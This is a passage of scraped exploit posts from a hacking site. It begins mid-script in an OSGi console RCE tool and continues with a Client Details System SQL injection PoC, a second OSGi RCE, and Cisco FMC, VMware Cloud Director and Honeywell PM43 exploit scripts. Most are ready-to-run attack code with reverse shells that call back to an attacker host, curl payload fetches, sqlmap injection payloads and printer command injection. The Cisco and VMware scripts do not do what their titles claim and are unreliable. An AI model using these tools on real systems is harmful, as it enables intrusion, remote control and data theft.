port=%d;" \ "String cmd=\"sh\";Process p=new ProcessBuilder(cmd)." \ "redirectErrorStream(true).start();Socket s=new Socket(host,port);" \ "InputStream pi=p.getInputStream(),pe=p.getErrorStream(), " \ "si=s.getInputStream();OutputStream po=p.getOutputStream()," \ "so=s.getOutputStream();while(!s.isClosed()){while(pi.available()" \ ">0)so.write(pi.read());while(pe.available()>0)so.write(pe.read());" \ "while(si.available()>0)po.write(si.read());so.flush();po.flush();" \ "Thread.sleep(50);try {p.exitValue();break;}catch (Exception e){}};" \ "p.destroy();s.close();}}\n" % ( lhost, lport) return payload def run_payload_delivery(lhost, lport): """ This function is responsible for payload delivery. """ print("Setting up the HTTP server for payload delivery...") handler_class = partial(HandlerClass, lhost, lport) server_address = ('', 80) httpd = HTTPServer(server_address, handler_class) try: print("[+] HTTP server is running.") httpd.serve_forever() except KeyboardInterrupt: print("[+] Payload delivered.") except Exception as err: # pylint: disable=broad-except print("[-] Failed payload delivery!") print(err) finally: httpd.server_close() def generate_stage_1(lhost): """ This function generates the stage 1 of the payload. """ stage_1 = b"fork \"curl http://%s -o ./RevShell.java\"\n" % ( lhost.encode() ) return stage_1 def generate_stage_2(): """ This function generates the stage 2 of the payload. """ stage_2 = b"fork \"java ./RevShell.java\"\n" return stage_2 def establish_connection(rhost, rport): """ This function creates a socket and establishes the connection to the target host. """ print("[*] Connecting to OSGi Console...") sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((rhost, rport)) print("[+] Connected.") return sock def process_handshake(sock): """ This function process the handshake with the target host. """ print("[*] Processing the handshake...") sock.recv(BUFFER_SIZE) sock.send(HANDSHAKE_STAGE_1) sock.recv(BUFFER_SIZE) sock.send(HANDSHAKE_STAGE_2) sock.recv(BUFFER_SIZE) sock.recv(BUFFER_SIZE) def deliver_payload(sock, lhost): """ This function executes the first stage of the exploitation. It triggers the payload delivery mechanism to the target host. """ stage_1 = generate_stage_1(lhost) print("[*] Triggering the payload delivery...") sock.send(stage_1) sock.recv(BUFFER_SIZE) sock.recv(BUFFER_SIZE) def execute_payload(sock): """ This function executes the second stage of the exploitation. It sends payload which is responsible for code execution. """ stage_2 = generate_stage_2() print("[*] Executing the payload...") sock.send(stage_2) sock.recv(BUFFER_SIZE) sock.recv(BUFFER_SIZE) print("[+] Payload executed.") def exploit(args, thread): """ This function sends the multistaged payload to the tareget host. """ try: sock = establish_connection(args.rhost, args.rport) process_handshake(sock) deliver_payload(sock, args.lhost) # Join the thread running the HTTP server # and wait for payload delivery thread.join() execute_payload(sock) sock.close() print("[+] Done.") except socket.error as err: print("[-] Could not connect!") print(err) sys.exit() def parse(): """ This fnction is used to parse and return command-line arguments. """ parser = argparse.ArgumentParser( prog="OSGi-3.8-console-RCE", description="This tool will let you open a reverse shell from the " "system that is running OSGi with the '-console' " "option in versions between 3.8 and 3.18.", epilog="Happy Hacking! :)", ) parser.add_argument("--rhost", dest="rhost", help="remote host", type=str, required=True) parser.add_argument("--rport", dest="rport", help="remote port", type=int, required=True) parser.add_argument("--lhost", dest="lhost", help="local host", type=str, required=False) parser.add_argument("--lport", dest="lport", help="local port", type=int, required=False) parser.add_argument("--version", action="version", version="%(prog)s 0.1.0") return parser.parse_args() def main(args): """ Main fuction. """ thread = threading.Thread( target=run_payload_delivery, args=(args.lhost, args.lport)) thread.start() exploit(args, thread) if __name__ == "__main__": main(parse())
  21. HireHackking

    Client Details System 1.0 - SQL Injection

    HireHackking posted a blog entry in Hacker Technology
    + **Exploit Title:** CVE-2023-7137_Client_Details_System-SQL_Injection_1 + **Date:** 2023-26-12 + **Exploit Author:** Hamdi Sevben + **Vendor Homepage:** https://code-projects.org/client-details-system-in-php-with-source-code/ + **Software Link:** https://download-media.code-projects.org/2020/01/CLIENT_DETAILS_SYSTEM_IN_PHP_WITH_SOURCE_CODE.zip + **Version:** 1.0 + **Tested on:** Windows 10 Pro + PHP 8.1.6, Apache 2.4.53 + **CVE:** CVE-2023-7137 ## References: + **CVE-2023-7137:** https://vuldb.com/?id.249140 + https://www.cve.org/CVERecord?id=CVE-2023-7137 + https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2023-7137 + https://nvd.nist.gov/vuln/detail/CVE-2023-7137 ## Description: Client Details System 1.0 allows SQL Injection via parameter 'uemail' in "/clientdetails/". Exploiting this issue could allow an attacker to compromise the application, access or modify data, or exploit latest vulnerabilities in the underlying database. ## Proof of Concept: + Go to the User Login page: "http://localhost/clientdetails/" + Fill email and password. + Intercept the request via Burp Suite and send to Repeater. + Copy and paste the request to a "r.txt" file. + Captured Burp request: ``` POST /clientdetails/ HTTP/1.1 Host: localhost Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,image/apng,*/*;q=0.8 Accept-Encoding: gzip, deflate Accept-Language: en-us,en;q=0.5 Cache-Control: no-cache Content-Length: 317 Content-Type: application/x-www-form-urlencoded Referer: http://localhost/clientdetails/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/100.0.4896.127 Safari/537.36 uemail=user@mail.com&login=LOG+IN&password=P@ass123 ``` + Use sqlmap to exploit. In sqlmap, use 'uemail' parameter to dump the database. ``` python sqlmap.py -r r.txt -p uemail --risk 3 --level 5 --threads 1 --random-agent tamper=between,randomcase --proxy="http://127.0.0.1:8080" --dbms mysql --batch --current-db ``` ``` --- Parameter: uemail (POST) Type: boolean-based blind Title: OR boolean-based blind - WHERE or HAVING clause (NOT) Payload: uemail=user@mail.com' OR NOT 6660=6660-- FlRf&login=LOG IN&password=P@ass123 Type: error-based Title: MySQL >= 5.0 AND error-based - WHERE, HAVING, ORDER BY or GROUP BY clause (FLOOR) Payload: uemail=user@mail.com' AND (SELECT 6854 FROM(SELECT COUNT(*),CONCAT(0x717a717a71,(SELECT (ELT(6854=6854,1))),0x7176627871,FLOOR(RAND(0)*2))x FROM INFORMATION_SCHEMA.PLUGINS GROUP BY x)a)-- Oxlo&login=LOG IN&password=P@ass123 Type: time-based blind Title: MySQL >= 5.0.12 AND time-based blind (query SLEEP) Payload: uemail=user@mail.com' AND (SELECT 5335 FROM (SELECT(SLEEP(5)))qsPA)-- pwtE&login=LOG IN&password=P@ass123 Type: UNION query Title: Generic UNION query (NULL) - 7 columns Payload: uemail=user@mail.com' UNION ALL SELECT NULL,CONCAT(0x717a717a71,0x45575259495444506f48756469467471555975554d6f794d77677a4f50547145735052567278434f,0x7176627871),NULL,NULL,NULL,NULL,NULL-- -&login=LOG IN&password=P@ass123 --- [14:58:11] [INFO] the back-end DBMS is MySQL web application technology: Apache 2.4.53, PHP, PHP 8.1.6 back-end DBMS: MySQL >= 5.0 (MariaDB fork) [14:58:11] [INFO] fetching current database current database: 'loginsystem' ``` + current database: `loginsystem` ![1](https://github.com/h4md153v63n/CVEs/assets/5091265/bfbec122-5b56-42df-beda-41dfdcaf527a)
  22. HireHackking

    OSGi v3.7.2 (and below) Console - RCE

    HireHackking posted a blog entry in Hacker Technology
    #!/usr/bin/python # Exploit Title: [OSGi v3.7.2 Console RCE] # Date: [2023-07-28] # Exploit Author: [Andrzej Olchawa, Milenko Starcik, # VisionSpace Technologies GmbH] # Exploit Repository: # [https://github.com/visionspacetec/offsec-osgi-exploits.git] # Vendor Homepage: [https://eclipse.dev/equinox] # Software Link: [https://archive.eclipse.org/equinox/] # Version: [3.7.2 and before] # Tested on: [Linux kali 6.3.0-kali1-amd64] # License: [MIT] # # Usage: # python exploit.py --help # # Examples: # python exploit.py --rhost=localhost --rport=1337 --lhost=localhost \ # --lport=4444 # # python exploit.py --rhost=localhost --rport=1337 --payload= \ # "curl http://192.168.100.100/osgi_test" """ This is an exploit that allows to open a reverse shell connection from the system running OSGi v3.7.2 and earlier. """ import argparse import base64 import socket def parse(): """ This fnction is used to parse and return command-line arguments. """ parser = argparse.ArgumentParser( prog="OSGi-3.7.2-console-RCE", description="This tool will let you open a reverse shell from the " "system that is running OSGi with the '-console' " "option in version 3.7.2 (or before).", epilog="Happy Hacking! :)", ) parser.add_argument("--rhost", dest="rhost", help="remote host", type=str, required=True) parser.add_argument("--rport", dest="rport", help="remote port", type=int, required=True) parser.add_argument("--lhost", dest="lhost", help="local host", type=str, required=False) parser.add_argument("--lport", dest="lport", help="local port", type=int, required=False) parser.add_argument("--payload", dest="custom_payload", help="custom payload", type=str, required=False) parser.add_argument("--version", action="version", version="%(prog)s 0.1.0") args = parser.parse_args() if args.custom_payload and (args.lhost or args.lport): parser.error( "either --payload or both --lport and --rport are required.") return args def generate_payload(lhost, lport, custom_payload): """ This function generates the whole payload ready for the delivery. """ payload = "" if custom_payload: payload = custom_payload print("(*) Using custom payload.") elif lhost and lport: payload = \ "echo 'import java.io.IOException;import java.io.InputStream;" \ "import java.io.OutputStream;import java.net.Socket;class Rev" \ "Shell {public static void main(String[] args) throws Excepti" \ "on { String host=\"%s\";int port=%s;String cmd=\"sh\";Proces" \ "s p=new ProcessBuilder(cmd).redirectErrorStream(true).start(" \ ");Socket s=new Socket(host,port);InputStream pi=p.getInputSt" \ "ream(),pe=p.getErrorStream(), si=s.getInputStream();OutputSt" \ "ream po=p.getOutputStream(), so=s.getOutputStream();while(!s" \ ".isClosed()){while(pi.available()>0)so.write(pi.read());whil" \ "e(pe.available()>0)so.write(pe.read());while(si.available()>" \ "0)po.write(si.read());so.flush();po.flush();Thread.sleep(50)" \ ";try {p.exitValue();break;}catch (Exception e){}};p.destroy(" \ ");s.close();}}' > RevShell.java ; java ./RevShell.java" % ( lhost, lport) print("(+) Using Java reverse shell payload.") bash_payload = b"bash -c {echo,%s}|{base64,-d}|{bash,-i}" % ( base64.b64encode(payload.encode())) wrapped_payload = b"fork \"%s\"\n" % (bash_payload) return wrapped_payload def deliver_payload(rhost, rport, payload): """ This function connects to the target host and delivers the payload. It returns True if successful; False otherwise. """ print("(*) Sending payload...") try: sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM) sock.connect((rhost, rport)) sock.send(payload) sock.close() except socket.error as err: print(f"(-) Could not deliver the payload to {rhost}:{rport}!") print(err) return False return True def main(args): """ Main function. """ payload = generate_payload(args.lhost, args.lport, args.custom_payload) success = deliver_payload(args.rhost, args.rport, payload) if success: print("(+) Done.") else: print("(-) Finished with errors.") if __name__ == "__main__": main(parse())
  23. HireHackking

    Cisco Firepower Management Center < 6.6.7.1 - Authenticated RCE

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: [Cisco Firepower Management Center] # Google Dork: [non] # Date: [12/06/2023] # Exploit Author: [Abdualhadi khalifa](https://twitter.com/absholi_ly) # Version: [6.2.3.18", "6.4.0.16", "6.6.7.1] # CVE : [CVE-2023-20048] import requests import json # set the variables for the URL, username, and password for the FMC web services interface fmc_url = "https://fmc.example.com" fmc_user = "admin" fmc_pass = "cisco123" # create a requests session to handle cookies and certificate verification session = requests.Session() session.verify = False # send a POST request to the /api/fmc_platform/v1/auth/generatetoken endpoint to get the access token and refresh token token_url = fmc_url + "/api/fmc_platform/v1/auth/generatetoken" response = session.post(token_url, auth=(fmc_user, fmc_pass)) # check the response status and extract the access token and refresh token from the response headers # set the access token as the authorization header for the subsequent requests try: if response.status_code == 200: access_token = response.headers["X-auth-access-token"] refresh_token = response.headers["X-auth-refresh-token"] session.headers["Authorization"] = access_token else: print("Failed to get tokens, status code: " + str(response.status_code)) exit() except Exception as e: print(e) exit() # set the variable for the domain id # change this to your domain id domain_id = "e276abec-e0f2-11e3-8169-6d9ed49b625f" # send a GET request to the /api/fmc_config/v1/domain/{DOMAIN_UUID}/devices/devicerecords endpoint to get the list of devices managed by FMC devices_url = fmc_url + "/api/fmc_config/v1/domain/" + domain_id + "/devices/devicerecords" response = session.get(devices_url) # check the response status and extract the data as a json object try: if response.status_code == 200: data = response.json() else: print("Failed to get devices, status code: " + str(response.status_code)) exit() except Exception as e: print(e) exit() # parse the data to get the list of device names and URLs devices = [] for item in data["items"]: device_name = item["name"] device_url = item["links"]["self"] devices.append((device_name, device_url)) # loop through the list of devices and send a GET request to the URL of each device to get the device details for device in devices: device_name, device_url = device response = session.get(device_url) # check the response status and extract the data as a json object try: if response.status_code == 200: data = response.json() else: print("Failed to get device details, status code: " + str(response.status_code)) continue except Exception as e: print(e) continue # parse the data to get the device type, software version, and configuration URL device_type = data["type"] device_version = data["metadata"]["softwareVersion"] config_url = data["metadata"]["configURL"] # check if the device type is FTD and the software version is vulnerable to the CVE-2023-20048 vulnerability # use the values from the affected products section in the security advisory if device_type == "FTD" and device_version in ["6.2.3.18", "6.4.0.16", "6.6.7.1"]: print("Device " + device_name + " is vulnerable to CVE-2023-20048") # create a list of commands that you want to execute on the device commands = ["show version", "show running-config", "show interfaces"] device_id = device_url.split("/")[-1] # loop through the list of commands and send a POST request to the /api/fmc_config/v1/domain/{DOMAIN_UUID}/devices/devicerecords/{DEVICE_ID}/operational/command/{COMMAND} endpoint to execute each command on the device # replace {DOMAIN_UUID} with your domain id, {DEVICE_ID} with your device id, and {COMMAND} with the command you want to execute for command in commands: command_url = fmc_url + "/api/fmc_config/v1/domain/" + domain_id + "/devices/devicerecords/" + device_id + "/operational/command/" + command response = session.post(command_url) # check the response status and extract the data as a json object try: if response.status_code == 200: data = response.json() else: print("Failed to execute command, status code: " + str(response.status_code)) continue except Exception as e: print(e) continue # parse the data to get the result of the command execution and print it result = data["result"] print("Command: " + command) print("Result: " + result) else: print("Device " + device_name + " is not vulnerable to CVE-2023-20048")
  24. HireHackking

    VMware Cloud Director 10.5 - Bypass identity verification

    HireHackking posted a blog entry in Hacker Technology
    # Exploit Title: [VMware Cloud Director | Bypass identity verification] # Google Dork: [non] # Date: [12/06/2023] # Exploit Author: [Abdualhadi khalifa](https://twitter.com/absholi_ly) # Version: [10.5] # CVE : [CVE-2023-34060] import requests import paramiko import subprocess import socket import argparse import threading # Define a function to check if a port is open def is_port_open(ip, port): # Create a socket object s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) # Set the timeout to 1 second s.settimeout(1) # Try to connect to the port try: s.connect((ip, port)) # The port is open return True except: # The port is closed return False finally: # Close the socket s.close() # Define a function to exploit a vulnerable device def exploit_device(ip, port, username, password, command): # Create a ssh client object client = paramiko.SSHClient() # Set the policy to accept any host key client.set_missing_host_key_policy(paramiko.AutoAddPolicy()) # Connect to the target using the credentials client.connect(ip, port, "root", "vmware", allow_agent=False, look_for_keys=False) # Execute the command and get the output stdin, stdout, stderr = client.exec_command(command) # Print the output print(f"The output of the command {command} on the device {ip}:{port} is: {stdout.read().decode()}") # Close the ssh connection client.close() # Parse the arguments from the user parser = argparse.ArgumentParser(description="A Python program to detect and exploit the CVE-2023-34060 vulnerability in VMware Cloud Director") parser.add_argument("ip", help="The target IP address") parser.add_argument("-p", "--ports", nargs="+", type=int, default=[22, 5480], help="The target ports to check") parser.add_argument("-u", "--username", default="root", help="The username for ssh") parser.add_argument("-w", "--password", default="vmware", help="The password for ssh") parser.add_argument("-c", "--command", default="hostname", help="The command to execute on the vulnerable devices") args = parser.parse_args() # Loop through the ports and check for the vulnerability for port in args.ports: # Check if the port is open if is_port_open(args.ip, port): # The port is open, send a GET request to the port and check the status code response = requests.get(f"http://{args.ip}:{port}") if response.status_code == 200: # The port is open and vulnerable print(f"Port {port} is vulnerable to CVE-2023-34060") # Create a thread to exploit the device thread = threading.Thread(target=exploit_device, args=(args.ip, port, args.username, args.password, args.command)) # Start the thread thread.start() else: # The port is open but not vulnerable print(f"Port {port} is not vulnerable to CVE-2023-34060") else: # The port is closed print(f"Port {port} is closed")
  25. HireHackking

    Honeywell PM43 < P10.19.050004 - Remote Code Execution (RCE)

    HireHackking posted a blog entry in Hacker Technology
    #- Exploit Title: Honeywell PM43 < P10.19.050004 - Remote Code Execution (RCE) #- Shodan Dork: http.title:PM43 , PM43 #- Exploit Author: ByteHunter #- Email: 0xByteHunter@proton.me #- Frimware Version: versions prior to P10.19.050004 #- Tested on: P10.17.019667 #- CVE : CVE-2023-3710 import requests import argparse BLUE = '\033[94m' YELLOW = '\033[93m' RESET = '\033[0m' def banner(): banner = """ ╔════════════════════════════════════════════════╗ CVE-2023-3710 Command Injection in Honeywell PM43 Printers Author: ByteHunter ╚════════════════════════════════════════════════╝ """ print(YELLOW + banner + RESET) def run_command(url, command): full_url = f"{url}/loadfile.lp?pageid=Configure" payload = { 'username': f'hunt\n{command}\n', 'userpassword': 'admin12345admin!!' } try: response = requests.post(full_url, data=payload, verify=False) response_text = response.text html_start_index = response_text.find('<html>') if html_start_index != -1: return response_text[:html_start_index] else: return response_text except requests.exceptions.RequestException as e: return f"Error: {e}" def main(): parser = argparse.ArgumentParser(description='Command Injection PoC for Honeywell PM43 Printers') parser.add_argument('--url', dest='url', help='Target URL', required=True) parser.add_argument('--run', dest='command', help='Command to execute', required=True) args = parser.parse_args() response = run_command(args.url, args.command) print(f"{BLUE}{response}{RESET}") if __name__ == "__main__": banner() main()